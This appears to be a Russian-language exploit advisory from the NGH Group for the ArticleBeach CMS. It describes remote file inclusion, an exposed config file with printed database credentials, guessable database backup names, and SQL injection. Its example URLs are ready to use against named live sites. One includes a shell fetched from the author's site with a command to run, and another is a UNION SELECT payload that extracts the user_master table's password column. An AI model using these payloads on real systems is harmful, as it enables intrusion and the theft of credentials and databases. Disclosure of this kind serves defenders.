Software: все версии
Vendor: ArticleBeach
www.articlebeach.com
Vulnerability: выполнение произвольных команд, просмотр пароля доступа к базе
данных, доступ к бекапам базы данных, sql-инъекция.
discovered by durito [NGH Group] -durito[at]mail[dot]ru-
durito.narod.ru
ngh.void.ru
Выполнение произвольных команд
Параметр page скрипта index.php инкдудит внешние файлы без всякой проверки.
http://www.xxx.com/index.php?page=http://ataker_site/
Пример:
http://www.articlebeach.com/index.php?page= http://durito.narod.ru/sh&cmd=ls%20-lpa
Просмотр пароля доступа к базе данных
Любой сторонний пользователь может получить конфигурационный файл содержащий
реквизиты доступа к базе данных из папки /includes/
http://www.xxx.com/includes/config.inc
Пример:
http://www.articlebeach.com/includes/config.inc
Содержимое файла config.inc
<?
global $_cn;
global $dbserver;
global $db;
global $dbuser;
global $dbpass;
//mysql database server, login,password & Database name
$dbserver ="localhost";
$database_connect="article_art";
$dbuser ="article_jer";
$dbpass ="aaaaa";
$connect = mysql_connect($dbserver, $dbuser, $dbpass)
or die("Couldn't connect to MySQL");
mysql_select_db($database_connect, $connect);
?>
Доступ к бекапам базы данных
Бекапы базы данных находятся в директории /backup/ и доступны для просмотра
удаленному пользователю, имя файла состоит из названия базы (article_art) и даты
бекапа 22/12/2005 (22122005) и может быть легко предугадано злоумышленником.
Пример:
http://www.articlebeach.com/backup/article_art_22122005.sql
http://25000articles.com/backup/mydisk_25000a_13122005.sql
Sql-инъекция
Параметр category_id не осуществляет фильтрацию, что приводит к возможности
выполнения Sql-инъекции.
Экплойт:
http://www.xxx.com/index.php?pg=3&page=category&category_id=[SQL]
Пример:
http://www.articlebeach.com/index.php?pg=3&page=category&category_id=
22+union+select+1,2,3,4,5,6,7,password+from+user_master/*